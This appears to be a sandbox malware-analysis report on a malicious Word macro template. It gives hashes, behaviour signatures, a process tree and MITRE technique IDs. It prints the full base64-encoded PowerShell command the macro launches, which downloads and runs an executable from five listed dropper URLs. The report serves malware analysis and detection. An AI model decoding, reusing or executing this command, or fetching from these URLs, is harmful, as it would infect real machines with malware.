Analysis

  • max time kernel
    109s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 21:59

General

  • Target

    82e1e3df0f694eb0211a9d5291b43356953764557f25bd7b7b1de129b520ed17.dotm

  • Size

    153KB

  • MD5

    d717d96065b8fb5fb93ba5766d96eb34

  • SHA1

    12039b3e2b7e484d70509b1aebc2ee778ad05fc3

  • SHA256

    82e1e3df0f694eb0211a9d5291b43356953764557f25bd7b7b1de129b520ed17

  • SHA512

    8f7514795ade123c0c35375c8f36e843925fcf735a441c1431e897bb4dbf9a28db6bd4dc68c2fcbe1fe735793171c258661d5ed9ec6cdb4fe58d5aa692a4411e

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://think1.com/wp-content/upgrade/2na4-4q5g-751619964/

exe.dropper

http://broadpeakdefense.com/fbsgf/McZcBMeM/

exe.dropper

https://lecairtravels.com/wp-admin/bXwjcdeg/

exe.dropper

https://www.biyunhui.com/fj/wbTKndf/

exe.dropper

http://nautcoins.com/wp-includes/AcZxFxQ/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\82e1e3df0f694eb0211a9d5291b43356953764557f25bd7b7b1de129b520ed17.dotm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4532
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enco JABJADkARwBRAE4ARgA9ACcAdABMAHcAWABaAHEAegA3ACcAOwAkAE0ANABXADcAaABuACAAPQAgACcAMwA5ADMAJwA7ACQAdABIAHcAMABKAGoASgB0AD0AJwBWAHAAagByAEsAMwAnADsAJABEAHcAagBCAHoAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATQA0AFcANwBoAG4AKwAnAC4AZQB4AGUAJwA7ACQAQwA3ADAAUgB2AEkAbQA9ACcAcABqAEcAYQBpAHoAdAAnADsAJABiAHUAcgBwAHIAcgA0ADAAPQAuACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAQwBsAGkARQBuAFQAOwAkAG8AdgAwAGYAVwA5AEgAcAA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGsAMQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABnAHIAYQBkAGUALwAyAG4AYQA0AC0ANABxADUAZwAtADcANQAxADYAMQA5ADkANgA0AC8AQABoAHQAdABwADoALwAvAGIAcgBvAGEAZABwAGUAYQBrAGQAZQBmAGUAbgBzAGUALgBjAG8AbQAvAGYAYgBzAGcAZgAvAE0AYwBaAGMAQgBNAGUATQAvAEAAaAB0AHQAcABzADoALwAvAGwAZQBjAGEAaQByAHQAcgBhAHYAZQBsAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGIAWAB3AGoAYwBkAGUAZwAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYgBpAHkAdQBuAGgAdQBpAC4AYwBvAG0ALwBmAGoALwB3AGIAVABLAG4AZABmAC8AQABoAHQAdABwADoALwAvAG4AYQB1AHQAYwBvAGkAbgBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBBAGMAWgB4AEYAeABRAC8AJwAuACIAcwBwAGwAYABpAFQAIgAoACcAQAAnACkAOwAkAFUAXwA5AHMARABYAD0AJwBYAGoAUQByAFAAegA0ACcAOwBmAG8AcgBlAGEAYwBoACgAJABIAEoAVgBCADMAdgAgAGkAbgAgACQAbwB2ADAAZgBXADkASABwACkAewB0AHIAeQB7ACQAYgB1AHIAcAByAHIANAAwAC4AIgBEAGAAbwBgAFcAYABOAGwATwBBAEQAZgBJAEwARQAiACgAJABIAEoAVgBCADMAdgAsACAAJABEAHcAagBCAHoAMQApADsAJABwADgAawBYAG4AVwBFAD0AJwBJAEkANAA0ADIAegBGACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQARAB3AGoAQgB6ADEAKQAuACIATABgAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAMgAyADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAdAAiACgAJABEAHcAagBCAHoAMQApADsAJABrAFYANABtAEEAUABxAEcAPQAnAGQAdQBPAEoATQBCAHcAQQAnADsAYgByAGUAYQBrADsAJABqADUAdABzAE0ASQBuAGsAPQAnAGYASQBWADkAawBBADYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASAA4AFEAUABIAHoAYQA9ACcAagAxAEIARgBiAHQAUgB3ACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2624

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2624-141-0x00007FFE4B0C0000-0x00007FFE4BB81000-memory.dmp
      Filesize

      10.8MB

    • memory/2624-140-0x00000241B8710000-0x00000241B8732000-memory.dmp
      Filesize

      136KB

    • memory/3860-137-0x0000000000000000-mapping.dmp
    • memory/4532-138-0x000001D523A80000-0x000001D523A84000-memory.dmp
      Filesize

      16KB

    • memory/4532-134-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
      Filesize

      64KB

    • memory/4532-135-0x00007FFE35080000-0x00007FFE35090000-memory.dmp
      Filesize

      64KB

    • memory/4532-136-0x00007FFE35080000-0x00007FFE35090000-memory.dmp
      Filesize

      64KB

    • memory/4532-133-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
      Filesize

      64KB

    • memory/4532-130-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
      Filesize

      64KB

    • memory/4532-139-0x000001D51DB64000-0x000001D51DB66000-memory.dmp
      Filesize

      8KB

    • memory/4532-132-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
      Filesize

      64KB

    • memory/4532-131-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
      Filesize

      64KB

    • memory/4532-143-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
      Filesize

      64KB

    • memory/4532-144-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
      Filesize

      64KB

    • memory/4532-145-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
      Filesize

      64KB

    • memory/4532-146-0x00007FFE379B0000-0x00007FFE379C0000-memory.dmp
      Filesize

      64KB